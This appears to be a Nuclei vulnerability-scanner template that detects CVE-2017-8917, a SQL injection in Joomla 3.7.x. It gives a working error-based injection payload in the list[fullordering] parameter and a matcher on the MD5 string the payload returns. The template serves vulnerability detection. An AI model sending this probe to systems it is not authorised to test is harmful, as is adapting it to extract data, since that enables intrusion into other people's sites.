nuclei-templates/cves/2017/CVE-2017-8917.yaml

25 lines
769 B
YAML

id: CVE-2017-8917
info:
name: Joomla SQL Injection
author: princechaddha
severity: critical
description: SQL injection vulnerability in Joomla! 3.7.x before 3.7.1 allows attackers to execute arbitrary SQL commands via unspecified vectors.
reference: https://www.cvedetails.com/cve/CVE-2017-8917/
tags: cve,cve2017,joomla,sqli
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2017-8917
cwe-id: CWE-89
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(8888)),1)"
matchers:
- type: word
words:
- "cf79ae6addba60ad018347359bd144d2"
part: body